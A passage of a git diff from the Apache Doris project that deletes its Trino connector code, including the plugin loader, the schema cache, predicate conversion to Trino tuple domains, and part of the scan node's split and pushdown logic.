- DecimalType decimal = (DecimalType) type; - return ScalarType.createDecimalV3Type(decimal.getPrecision(), decimal.getScale()); - } else if (type instanceof TimeType) { - return Type.STRING; - } else if (type instanceof DateType) { - return ScalarType.createDateV2Type(); - } else if (type instanceof TimestampType) { - TimestampType timestampType = (TimestampType) type; - return ScalarType.createDatetimeV2Type(getMaxDatetimePrecision(timestampType.getPrecision())); - } else if (type instanceof TimestampWithTimeZoneType) { - TimestampWithTimeZoneType timestampWithTimeZoneType = (TimestampWithTimeZoneType) type; - return ScalarType.createDatetimeV2Type(getMaxDatetimePrecision(timestampWithTimeZoneType.getPrecision())); - } else if (type instanceof io.trino.spi.type.ArrayType) { - Type elementType = trinoConnectorTypeToDorisType( - ((io.trino.spi.type.ArrayType) type).getElementType()); - return ArrayType.create(elementType, true); - } else if (type instanceof io.trino.spi.type.MapType) { - Type keyType = trinoConnectorTypeToDorisType( - ((io.trino.spi.type.MapType) type).getKeyType()); - Type valueType = trinoConnectorTypeToDorisType( - ((io.trino.spi.type.MapType) type).getValueType()); - return new MapType(keyType, valueType, true, true); - } else if (type instanceof RowType) { - ArrayList dorisFields = Lists.newArrayList(); - for (Field field : ((RowType) type).getFields()) { - Type childType = trinoConnectorTypeToDorisType(field.getType()); - if (field.getName().isPresent()) { - dorisFields.add(new StructField(field.getName().get(), childType)); - } else { - dorisFields.add(new StructField(childType)); - } - } - return new StructType(dorisFields); - } else { - throw new IllegalArgumentException("Cannot transform unknown type: " + type); - } - } - - private int getMaxDatetimePrecision(int precision) { - return Math.min(precision, 6); - } - - public ConnectorTableHandle getConnectorTableHandle() { - makeSureInitialized(); - Optional schemaCacheValue = getSchemaCacheValue(); - return schemaCacheValue.map(value -> ((TrinoSchemaCacheValue) value).getConnectorTableHandle().get()) - .orElse(null); - } - - public ConnectorMetadata getConnectorMetadata() { - makeSureInitialized(); - Optional schemaCacheValue = getSchemaCacheValue(); - return schemaCacheValue.map(value -> ((TrinoSchemaCacheValue) value).getConnectorMetadata()).orElse(null); - } - - public ConnectorTransactionHandle getConnectorTransactionHandle() { - makeSureInitialized(); - Optional schemaCacheValue = getSchemaCacheValue(); - return schemaCacheValue.map(value -> ((TrinoSchemaCacheValue) value).getConnectorTransactionHandle()) - .orElse(null); - } - - public Map getColumnHandleMap() { - makeSureInitialized(); - Optional schemaCacheValue = getSchemaCacheValue(); - return schemaCacheValue.map(value -> ((TrinoSchemaCacheValue) value).getColumnHandleMap()).orElse(null); - } - - public Map getColumnMetadataMap() { - makeSureInitialized(); - Optional schemaCacheValue = getSchemaCacheValue(); - return schemaCacheValue.map(value -> ((TrinoSchemaCacheValue) value).getColumnMetadataMap()).orElse(null); - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorPluginLoader.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorPluginLoader.java deleted file mode 100644 index bc925785c57ebb..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoConnectorPluginLoader.java +++ /dev/null @@ -1,134 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.trinoconnector; - -import org.apache.doris.common.Config; -import org.apache.doris.common.EnvUtils; -import org.apache.doris.trinoconnector.TrinoConnectorPluginManager; - -import com.google.common.util.concurrent.MoreExecutors; -import io.trino.FeaturesConfig; -import io.trino.metadata.HandleResolver; -import io.trino.metadata.TypeRegistry; -import io.trino.server.ServerPluginsProvider; -import io.trino.server.ServerPluginsProviderConfig; -import io.trino.spi.type.TypeOperators; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -import java.io.File; -import java.util.logging.FileHandler; -import java.util.logging.Level; -import java.util.logging.SimpleFormatter; - -// Noninstancetiable utility class -public class TrinoConnectorPluginLoader { - private static final Logger LOG = LogManager.getLogger(TrinoConnectorPluginLoader.class); - - // Suppress default constructor for noninstantiability - private TrinoConnectorPluginLoader() { - throw new AssertionError(); - } - - private static class TrinoConnectorPluginLoad { - private static FeaturesConfig featuresConfig = new FeaturesConfig(); - private static TypeOperators typeOperators = new TypeOperators(); - private static HandleResolver handleResolver = new HandleResolver(); - private static TypeRegistry typeRegistry; - private static TrinoConnectorPluginManager trinoConnectorPluginManager; - - static { - try { - // Allow self-attachment for Java agents,this is required for certain debugging and monitoring functions - System.setProperty("jdk.attach.allowAttachSelf", "true"); - // Get the operating system name - String osName = System.getProperty("os.name").toLowerCase(); - // Skip HotSpot SAAttach for Mac/Darwin systems to avoid potential issues - if (osName.contains("mac") || osName.contains("darwin")) { - System.setProperty("jol.skipHotspotSAAttach", "true"); - } - // Trino uses jul as its own log system, so the attributes of JUL are configured here - System.setProperty("java.util.logging.SimpleFormatter.format", - "%1$tY-%1$tm-%1$td %1$tH:%1$tM:%1$tS %4$s: %5$s%6$s%n"); - java.util.logging.Logger logger = java.util.logging.Logger.getLogger(""); - logger.setUseParentHandlers(false); - FileHandler fileHandler = new FileHandler(EnvUtils.getDorisHome() + "/log/trinoconnector%g.log", - 500000000, 10, true); - fileHandler.setLevel(Level.INFO); - fileHandler.setFormatter(new SimpleFormatter()); - logger.addHandler(fileHandler); - java.util.logging.LogManager.getLogManager().addLogger(logger); - - typeRegistry = new TypeRegistry(typeOperators, featuresConfig); - ServerPluginsProviderConfig serverPluginsProviderConfig = new ServerPluginsProviderConfig() - .setInstalledPluginsDir(new File(checkAndReturnPluginDir())); - ServerPluginsProvider serverPluginsProvider = new ServerPluginsProvider(serverPluginsProviderConfig, - MoreExecutors.directExecutor()); - trinoConnectorPluginManager = new TrinoConnectorPluginManager(serverPluginsProvider, - typeRegistry, handleResolver); - trinoConnectorPluginManager.loadPlugins(); - } catch (Exception e) { - LOG.warn("Failed load trino-connector plugins from " + checkAndReturnPluginDir() - + ", Exception:" + e.getMessage(), e); - } - } - - private static String checkAndReturnPluginDir() { - final String defaultDir = System.getenv("DORIS_HOME") + "/plugins/connectors"; - final String defaultOldDir = System.getenv("DORIS_HOME") + "/connectors"; - if (Config.trino_connector_plugin_dir.equals(defaultDir)) { - // If true, which means user does not set `trino_connector_plugin_dir` and use the default one. - // Because in 2.1.8, we change the default value of `trino_connector_plugin_dir` - // from `DORIS_HOME/connectors` to `DORIS_HOME/plugins/connectors`, - // so we need to check the old default dir for compatibility. - File oldDir = new File(defaultOldDir); - if (oldDir.exists() && oldDir.isDirectory()) { - String[] contents = oldDir.list(); - if (contents != null && contents.length > 0) { - // there are contents in old dir, use old one - return defaultOldDir; - } - } - return defaultDir; - } else { - // Return user specified dir directly. - return Config.trino_connector_plugin_dir; - } - } - } - - public static FeaturesConfig getFeaturesConfig() { - return TrinoConnectorPluginLoad.featuresConfig; - } - - public static TypeOperators getTypeOperators() { - return TrinoConnectorPluginLoad.typeOperators; - } - - public static HandleResolver getHandleResolver() { - return TrinoConnectorPluginLoad.handleResolver; - } - - public static TypeRegistry getTypeRegistry() { - return TrinoConnectorPluginLoad.typeRegistry; - } - - public static TrinoConnectorPluginManager getTrinoConnectorPluginManager() { - return TrinoConnectorPluginLoad.trinoConnectorPluginManager; - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoSchemaCacheValue.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoSchemaCacheValue.java deleted file mode 100644 index 43bbe76c3b303b..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/TrinoSchemaCacheValue.java +++ /dev/null @@ -1,90 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.trinoconnector; - -import org.apache.doris.catalog.Column; -import org.apache.doris.datasource.SchemaCacheValue; - -import io.trino.spi.connector.ColumnHandle; -import io.trino.spi.connector.ColumnMetadata; -import io.trino.spi.connector.ConnectorMetadata; -import io.trino.spi.connector.ConnectorTableHandle; -import io.trino.spi.connector.ConnectorTransactionHandle; - -import java.util.List; -import java.util.Map; -import java.util.Optional; - -public class TrinoSchemaCacheValue extends SchemaCacheValue { - private ConnectorMetadata connectorMetadata; - private Optional connectorTableHandle; - private ConnectorTransactionHandle connectorTransactionHandle; - private Map columnHandleMap; - private Map columnMetadataMap; - - public TrinoSchemaCacheValue(List schema, ConnectorMetadata connectorMetadata, - Optional connectorTableHandle, ConnectorTransactionHandle connectorTransactionHandle, - Map columnHandleMap, Map columnMetadataMap) { - super(schema); - this.connectorMetadata = connectorMetadata; - this.connectorTableHandle = connectorTableHandle; - this.connectorTransactionHandle = connectorTransactionHandle; - this.columnHandleMap = columnHandleMap; - this.columnMetadataMap = columnMetadataMap; - } - - public ConnectorMetadata getConnectorMetadata() { - return connectorMetadata; - } - - public Optional getConnectorTableHandle() { - return connectorTableHandle; - } - - public ConnectorTransactionHandle getConnectorTransactionHandle() { - return connectorTransactionHandle; - } - - public Map getColumnHandleMap() { - return columnHandleMap; - } - - public Map getColumnMetadataMap() { - return columnMetadataMap; - } - - public void setConnectorMetadata(ConnectorMetadata connectorMetadata) { - this.connectorMetadata = connectorMetadata; - } - - public void setConnectorTableHandle(Optional connectorTableHandle) { - this.connectorTableHandle = connectorTableHandle; - } - - public void setConnectorTransactionHandle(ConnectorTransactionHandle connectorTransactionHandle) { - this.connectorTransactionHandle = connectorTransactionHandle; - } - - public void setColumnHandleMap(Map columnHandleMap) { - this.columnHandleMap = columnHandleMap; - } - - public void setColumnMetadataMap(Map columnMetadataMap) { - this.columnMetadataMap = columnMetadataMap; - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/source/TrinoConnectorPredicateConverter.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/source/TrinoConnectorPredicateConverter.java deleted file mode 100644 index 2ccd069f8286f1..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/source/TrinoConnectorPredicateConverter.java +++ /dev/null @@ -1,334 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.trinoconnector.source; - -import org.apache.doris.analysis.BinaryPredicate; -import org.apache.doris.analysis.CastExpr; -import org.apache.doris.analysis.CompoundPredicate; -import org.apache.doris.analysis.DateLiteral; -import org.apache.doris.analysis.DecimalLiteral; -import org.apache.doris.analysis.Expr; -import org.apache.doris.analysis.InPredicate; -import org.apache.doris.analysis.IsNullPredicate; -import org.apache.doris.analysis.LiteralExpr; -import org.apache.doris.analysis.NullLiteral; -import org.apache.doris.analysis.SlotRef; -import org.apache.doris.common.AnalysisException; -import org.apache.doris.common.util.TimeUtils; - -import com.google.common.collect.ImmutableMap; -import com.google.common.collect.Lists; -import io.airlift.slice.Slices; -import io.trino.spi.connector.ColumnHandle; -import io.trino.spi.connector.ColumnMetadata; -import io.trino.spi.predicate.Domain; -import io.trino.spi.predicate.Range; -import io.trino.spi.predicate.TupleDomain; -import io.trino.spi.predicate.ValueSet; -import io.trino.spi.type.Int128; -import io.trino.spi.type.LongTimestamp; -import io.trino.spi.type.LongTimestampWithTimeZone; -import io.trino.spi.type.TimeZoneKey; -import io.trino.spi.type.Type; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -import java.math.BigDecimal; -import java.util.List; -import java.util.Map; -import java.util.Objects; -import java.util.TimeZone; - - -public class TrinoConnectorPredicateConverter { - private static final Logger LOG = LogManager.getLogger(TrinoConnectorPredicateConverter.class); - private static final String EPOCH_DATE = "1970-01-01"; - private static final String GMT = "GMT"; - private final Map trinoConnectorColumnHandleMap; - - private final Map trinoConnectorColumnMetadataMap; - - public TrinoConnectorPredicateConverter(Map columnHandleMap, - Map columnMetadataMap) { - this.trinoConnectorColumnHandleMap = columnHandleMap; - this.trinoConnectorColumnMetadataMap = columnMetadataMap; - } - - public TupleDomain convertExprToTrinoTupleDomain(Expr predicate) throws AnalysisException { - if (predicate instanceof CompoundPredicate) { - return compoundPredicateConverter((CompoundPredicate) predicate); - } else if (predicate instanceof InPredicate) { - return inPredicateConverter((InPredicate) predicate); - } else if (predicate instanceof BinaryPredicate) { - return binaryPredicateConverter((BinaryPredicate) predicate); - } else if (predicate instanceof IsNullPredicate) { - return isNullPredicateConverter((IsNullPredicate) predicate); - } else { - throw new AnalysisException("Do not support convert predicate: [" + predicate + "]."); - } - } - - private TupleDomain compoundPredicateConverter(CompoundPredicate compoundPredicate) - throws AnalysisException { - switch (compoundPredicate.getOp()) { - case AND: { - TupleDomain left = null; - TupleDomain right = null; - try { - left = convertExprToTrinoTupleDomain(compoundPredicate.getChild(0)); - } catch (AnalysisException e) { - LOG.warn("left predicate of compund predicate failed, exception: " + e.getMessage()); - } - try { - right = convertExprToTrinoTupleDomain(compoundPredicate.getChild(1)); - } catch (AnalysisException e) { - LOG.warn("right predicate of compound predicate failed, exception: " + e.getMessage()); - } - if (left != null && right != null) { - return left.intersect(right); - } else if (left != null) { - return left; - } else if (right != null) { - return right; - } - throw new AnalysisException("Can not convert both sides of compound predicate [" - + compoundPredicate.getOp() + "] to TupleDomain."); - } - case OR: { - TupleDomain left = convertExprToTrinoTupleDomain(compoundPredicate.getChild(0)); - TupleDomain right = convertExprToTrinoTupleDomain(compoundPredicate.getChild(1)); - return TupleDomain.columnWiseUnion(left, right); - } - case NOT: - default: - throw new AnalysisException("Do not support convert compound predicate [" + compoundPredicate.getOp() - + "] to TupleDomain."); - } - } - - private TupleDomain inPredicateConverter(InPredicate predicate) throws AnalysisException { - // Make sure the col slot is always first - SlotRef slotRef = convertExprToSlotRef(predicate.getChild(0)); - if (slotRef == null) { - throw new AnalysisException("slotRef is null in inPredicateConverter."); - } - String colName = slotRef.getColumnName(); - Type type = trinoConnectorColumnMetadataMap.get(colName).getType(); - List ranges = Lists.newArrayList(); - for (int i = 1; i < predicate.getChildren().size(); i++) { - LiteralExpr literalExpr = convertExprToLiteral(predicate.getChild(i)); - if (literalExpr == null) { - throw new AnalysisException("literalExpr of InPredicate's children is null in inPredicateConverter."); - } - ranges.add(Range.equal(type, convertLiteralToDomainValues(type.getClass(), literalExpr))); - } - - Domain domain = predicate.isNotIn() - ? Domain.create(ValueSet.all(type).subtract(ValueSet.ofRanges(ranges)), false) - : Domain.create(ValueSet.ofRanges(ranges), false); - TupleDomain tupleDomain = TupleDomain.withColumnDomains( - ImmutableMap.of(trinoConnectorColumnHandleMap.get(colName), domain)); - return tupleDomain; - } - - private TupleDomain binaryPredicateConverter(BinaryPredicate predicate) throws AnalysisException { - // Make sure the col slot is always first - SlotRef slotRef = convertExprToSlotRef(predicate.getChild(0)); - if (slotRef == null) { - throw new AnalysisException("slotRef is null in binaryPredicateConverter."); - } - LiteralExpr literalExpr = convertExprToLiteral(predicate.getChild(1)); - // literalExpr == null means predicate.getChild(1) is not a LiteralExpr or CastExpr - // such as 'where A.a < A.b',predicate.getChild(1) is SlotRef - if (literalExpr == null) { - throw new AnalysisException("literalExpr of BinaryPredicate's child is null in binaryPredicateConverter."); - } - - String colName = slotRef.getColumnName(); - Type type = trinoConnectorColumnMetadataMap.get(colName).getType(); - Domain domain = null; - BinaryPredicate.Operator op = ((BinaryPredicate) predicate).getOp(); - switch (op) { - case EQ: - domain = Domain.create(ValueSet.ofRanges(Range.equal(type, - convertLiteralToDomainValues(type.getClass(), literalExpr))), false); - break; - case EQ_FOR_NULL: { - if (literalExpr instanceof NullLiteral) { - domain = Domain.onlyNull(type); - } else { - domain = Domain.create(ValueSet.ofRanges(Range.equal(type, - convertLiteralToDomainValues(type.getClass(), literalExpr))), false); - } - break; - } - case NE: - domain = Domain.create(ValueSet.all(type).subtract(ValueSet.ofRanges(Range.equal(type, - convertLiteralToDomainValues(type.getClass(), literalExpr)))), false); - break; - case LT: - domain = Domain.create(ValueSet.ofRanges(Range.lessThan(type, - convertLiteralToDomainValues(type.getClass(), literalExpr))), false); - break; - case LE: - domain = Domain.create(ValueSet.ofRanges(Range.lessThanOrEqual(type, - convertLiteralToDomainValues(type.getClass(), literalExpr))), false); - break; - case GT: - domain = Domain.create(ValueSet.ofRanges(Range.greaterThan(type, - convertLiteralToDomainValues(type.getClass(), literalExpr))), false); - break; - case GE: - domain = Domain.create(ValueSet.ofRanges(Range.greaterThanOrEqual(type, - convertLiteralToDomainValues(type.getClass(), literalExpr))), false); - break; - default: - throw new AnalysisException("Do not support operator [" + op + "] in binaryPredicateConverter."); - } - return TupleDomain.withColumnDomains(ImmutableMap.of(trinoConnectorColumnHandleMap.get(colName), domain)); - } - - private TupleDomain isNullPredicateConverter(IsNullPredicate predicate) throws AnalysisException { - Objects.requireNonNull(predicate.getChild(0), "The first child of IsNullPredicate is null."); - SlotRef slotRef = convertExprToSlotRef(predicate.getChild(0)); - if (slotRef == null) { - throw new AnalysisException("slotRef is null in IsNullPredicate."); - } - String colName = slotRef.getColumnName(); - Type type = trinoConnectorColumnMetadataMap.get(colName).getType(); - if (predicate.isNotNull()) { - return TupleDomain.withColumnDomains( - ImmutableMap.of(trinoConnectorColumnHandleMap.get(colName), Domain.notNull(type))); - } - return TupleDomain.withColumnDomains( - ImmutableMap.of(trinoConnectorColumnHandleMap.get(colName), Domain.onlyNull(type))); - } - - /* Since different Trino types have different data formats stored in their Range, - we need to convert the data format stored in Doris's LiteralExpr to the corresponding Java data type - which can be recognized by the Trino Type Range. - The correspondence between different Trino types and the Java data types stored in their Range is as follows: - - Trino Type Java Type - - BooleanType boolean - TinyintType long - SmallintType long - IntegerType long - BigintType long - RealType long - ShortDecimalType long - LongDecimalType io.trino.spi.type.Int128 - CharType io.airlift.slice.Slice - VarbinaryType io.airlift.slice.Slice - VarcharType io.airlift.slice.Slice - DateType long - DoubleType double - TimeType long - ShortTimestampType long - LongTimestampType io.trino.spi.type.LongTimestamp - ShortTimestampWithTimeZoneType long - LongTimestampWithTimeZoneType io.trino.spi.type.LongTimestampWithTimeZone - ArrayType io.trino.spi.block.Block - MapType io.trino.spi.block.SqlMap - RowType io.trino.spi.block.SqlRow*/ - private Object convertLiteralToDomainValues(Class type, LiteralExpr literalExpr) - throws AnalysisException { - switch (type.getSimpleName()) { - case "BooleanType": - return literalExpr.getRealValue(); - case "TinyintType": - case "SmallintType": - case "IntegerType": - case "BigintType": - return literalExpr.getLongValue(); - case "RealType": - return (long) Float.floatToIntBits((float) literalExpr.getDoubleValue()); - case "DoubleType": - return literalExpr.getDoubleValue(); - case "ShortDecimalType": { - BigDecimal value = (BigDecimal) literalExpr.getRealValue(); - BigDecimal tmpValue = new BigDecimal(Math.pow(10, DecimalLiteral.getBigDecimalScale(value))); - value = value.multiply(tmpValue); - return value.longValue(); - } - case "LongDecimalType": { - BigDecimal value = (BigDecimal) literalExpr.getRealValue(); - BigDecimal tmpValue = new BigDecimal(Math.pow(10, DecimalLiteral.getBigDecimalScale(value))); - value = value.multiply(tmpValue); - return Int128.valueOf(value.toBigIntegerExact()); - } - case "CharType": - case "VarbinaryType": - case "VarcharType": - return Slices.utf8Slice((String) literalExpr.getRealValue()); - case "DateType": - return ((DateLiteral) literalExpr).daynr() - new DateLiteral(1970, 1, 1).daynr(); - case "ShortTimestampType": { - DateLiteral dateLiteral = (DateLiteral) literalExpr; - return dateLiteral.unixTimestamp(TimeZone.getTimeZone(GMT)) * 1000 - + dateLiteral.getMicrosecond(); - } - case "LongTimestampType": { - DateLiteral dateLiteral = (DateLiteral) literalExpr; - long epochMicros = dateLiteral.unixTimestamp(TimeZone.getTimeZone(GMT)) * 1000 - + dateLiteral.getMicrosecond(); - return new LongTimestamp(epochMicros, 0); - } - case "LongTimestampWithTimeZoneType": { - DateLiteral dateLiteral = (DateLiteral) literalExpr; - long epochMillis = dateLiteral.unixTimestamp(TimeUtils.getTimeZone()); - int picosOfMilli = (int) dateLiteral.getMicrosecond() * 1000000; - TimeZoneKey timeZoneKey = TimeZoneKey.getTimeZoneKey(TimeUtils.getTimeZone().toZoneId().toString()); - return LongTimestampWithTimeZone.fromEpochMillisAndFraction(epochMillis, picosOfMilli, timeZoneKey); - } - case "ShortTimestampWithTimeZoneType": - case "TimeType": - case "ArrayType": - case "MapType": - case "RowType": - default: - return new AnalysisException("Do not support convert trino type [" + type.getSimpleName() - + "] to domain values."); - } - } - - private SlotRef convertExprToSlotRef(Expr expr) { - SlotRef slotRef = null; - if (expr instanceof SlotRef) { - slotRef = (SlotRef) expr; - } else if (expr instanceof CastExpr) { - if (expr.getChild(0) instanceof SlotRef) { - slotRef = (SlotRef) expr.getChild(0); - } - } - return slotRef; - } - - private LiteralExpr convertExprToLiteral(Expr expr) { - LiteralExpr literalExpr = null; - if (expr instanceof LiteralExpr) { - literalExpr = (LiteralExpr) expr; - } else if (expr instanceof CastExpr) { - if (expr.getChild(0) instanceof LiteralExpr) { - literalExpr = (LiteralExpr) expr.getChild(0); - } - } - return literalExpr; - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/source/TrinoConnectorScanNode.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/source/TrinoConnectorScanNode.java deleted file mode 100644 index 279a71ded44ba7..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/trinoconnector/source/TrinoConnectorScanNode.java +++ /dev/null @@ -1,342 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.trinoconnector.source; - -import org.apache.doris.analysis.SlotDescriptor; -import org.apache.doris.analysis.TupleDescriptor; -import org.apache.doris.catalog.TableIf; -import org.apache.doris.common.AnalysisException; -import org.apache.doris.common.DdlException; -import org.apache.doris.common.MetaNotFoundException; -import org.apache.doris.common.UserException; -import org.apache.doris.datasource.FileQueryScanNode; -import org.apache.doris.datasource.TableFormatType; -import org.apache.doris.datasource.trinoconnector.TrinoConnectorPluginLoader; -import org.apache.doris.planner.PlanNodeId; -import org.apache.doris.planner.ScanContext; -import org.apache.doris.qe.SessionVariable; -import org.apache.doris.spi.Split; -import org.apache.doris.thrift.TFileAttributes; -import org.apache.doris.thrift.TFileFormatType; -import org.apache.doris.thrift.TFileRangeDesc; -import org.apache.doris.thrift.TTableFormatFileDesc; -import org.apache.doris.thrift.TTrinoConnectorFileDesc; -import org.apache.doris.trinoconnector.TrinoColumnMetadata; - -import com.fasterxml.jackson.databind.Module; -import com.google.common.collect.ImmutableMap; -import com.google.common.collect.Lists; -import com.google.common.collect.Maps; -import io.airlift.concurrent.BoundedExecutor; -import io.airlift.concurrent.MoreFutures; -import io.airlift.concurrent.Threads; -import io.airlift.json.JsonCodecFactory; -import io.airlift.json.ObjectMapperProvider; -import io.trino.Session; -import io.trino.SystemSessionProperties; -import io.trino.block.BlockJsonSerde; -import io.trino.metadata.BlockEncodingManager; -import io.trino.metadata.HandleJsonModule; -import io.trino.metadata.HandleResolver; -import io.trino.metadata.InternalBlockEncodingSerde; -import io.trino.spi.block.Block; -import io.trino.spi.connector.ColumnHandle; -import io.trino.spi.connector.ColumnMetadata; -import io.trino.spi.connector.Connector; -import io.trino.spi.connector.ConnectorMetadata; -import io.trino.spi.connector.ConnectorSession; -import io.trino.spi.connector.ConnectorSplitManager; -import io.trino.spi.connector.ConnectorSplitSource; -import io.trino.spi.connector.ConnectorTableHandle; -import io.trino.spi.connector.Constraint; -import io.trino.spi.connector.ConstraintApplicationResult; -import io.trino.spi.connector.DynamicFilter; -import io.trino.spi.connector.LimitApplicationResult; -import io.trino.spi.connector.ProjectionApplicationResult; -import io.trino.spi.expression.ConnectorExpression; -import io.trino.spi.expression.Variable; -import io.trino.spi.predicate.TupleDomain; -import io.trino.spi.type.TypeManager; -import io.trino.split.BufferingSplitSource; -import io.trino.split.ConnectorAwareSplitSource; -import io.trino.split.SplitSource; -import io.trino.type.InternalTypeManager; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -import java.util.ArrayList; -import java.util.HashSet; -import java.util.List; -import java.util.Map; -import java.util.Optional; -import java.util.Set; -import java.util.concurrent.ExecutorService; -import java.util.concurrent.Executors; -import java.util.stream.Collectors; - -public class TrinoConnectorScanNode extends FileQueryScanNode { - private static final Logger LOG = LogManager.getLogger(TrinoConnectorScanNode.class); - private static final int minScheduleSplitBatchSize = 10; - private TrinoConnectorSource source = null; - private ObjectMapperProvider objectMapperProvider; - - private ConnectorMetadata connectorMetadata; - private Constraint constraint; - - public TrinoConnectorScanNode(PlanNodeId id, TupleDescriptor desc, boolean needCheckColumnPriv, - SessionVariable sv, ScanContext scanContext) { - super(id, desc, "TRINO_CONNECTOR_SCAN_NODE", scanContext, needCheckColumnPriv, sv); - } - - @Override - protected void doInitialize() throws UserException { - super.doInitialize(); - source = new TrinoConnectorSource(desc); - } - - @Override - protected void convertPredicate() { - if (conjuncts.isEmpty()) { - constraint = Constraint.alwaysTrue(); - } - TupleDomain summary = TupleDomain.all(); - TrinoConnectorPredicateConverter trinoConnectorPredicateConverter = new TrinoConnectorPredicateConverter( - source.getTargetTable().getColumnHandleMap(), - source.getTargetTable().getColumnMetadataMap()); - try { - for (int i = 0; i < conjuncts.size(); ++i) { - summary = summary.intersect( - trinoConnectorPredicateConverter.convertExprToTrinoTupleDomain(conjuncts.get(i))); - } - } catch (AnalysisException e) { - LOG.warn("Can not convert Expr to trino tuple domain, exception: {}", e.getMessage()); - summary = TupleDomain.all(); - } - constraint = new Constraint(summary); - } - - @Override - public List getSplits(int numBackends) throws UserException { - // 1. Get necessary objects - Connector connector = source.getConnector(); - connectorMetadata = source.getConnectorMetadata(); - ConnectorSession connectorSession = source.getTrinoSession().toConnectorSession(source.getCatalogHandle()); - - List splits = Lists.newArrayList(); - try { - connectorMetadata.beginQuery(connectorSession); - applyPushDown(connectorSession); - - // 3. get splitSource - try (SplitSource splitSource = getTrinoSplitSource(connector, source.getTrinoSession(), - source.getTrinoConnectorTableHandle(), DynamicFilter.EMPTY)) { - // 4. get trino.Splits and convert it to doris.Splits - while (!splitSource.isFinished()) { - for (io.trino.metadata.Split split : getNextSplitBatch(splitSource)) { - splits.add(new TrinoConnectorSplit(split.getConnectorSplit(), source.getConnectorName())); - } - } - } - } finally { - // 4. Clear query - connectorMetadata.cleanupQuery(connectorSession); - } - return splits; - } - - private void applyPushDown(ConnectorSession connectorSession) { - // push down predicate/filter - Optional> filterResult - = connectorMetadata.applyFilter(connectorSession, source.getTrinoConnectorTableHandle(), constraint); - if (filterResult.isPresent()) { - source.setTrinoConnectorTableHandle(filterResult.get().getHandle()); - } - - // push down limit - if (hasLimit()) { - long limit = getLimit(); - Optional> limitResult - = connectorMetadata.applyLimit(connectorSession, source.getTrinoConnectorTableHandle(), limit); - if (limitResult.isPresent()) { - source.setTrinoConnectorTableHandle(limitResult.get().getHandle()); - } - } - - if (LOG.isDebugEnabled()) { - LOG.debug("The TrinoConnectorTableHandle is " + source.getTrinoConnectorTableHandle() - + " after pushing down."); - } - - // push down projection - Map columnHandleMap = source.getTargetTable().getColumnHandleMap(); - Map columnMetadataMap = source.getTargetTable().getColumnMetadataMap(); - Map assignments = Maps.newLinkedHashMap(); - List projections = Lists.newArrayList(); - for (SlotDescriptor slotDescriptor : desc.getSlots()) { - String colName = slotDescriptor.getColumn().getName(); - assignments.put(colName, columnHandleMap.get(colName)); - projections.add(new Variable(colName, columnMetadataMap.get(colName).getType())); - } - Optional> projectionResult - = connectorMetadata.applyProjection(connectorSession, source.getTrinoConnectorTableHandle(), - projections, assignments); - if (projectionResult.isPresent()) { - source.setTrinoConnectorTableHandle(projectionResult.get().getHandle()); - } - } - - private SplitSource getTrinoSplitSource(Connector connector, Session session, ConnectorTableHandle table, - DynamicFilter dynamicFilter) { - ConnectorSplitManager splitManager = connector.getSplitManager(); - - if (!SystemSessionProperties.isAllowPushdownIntoConnectors(session)) { - dynamicFilter = 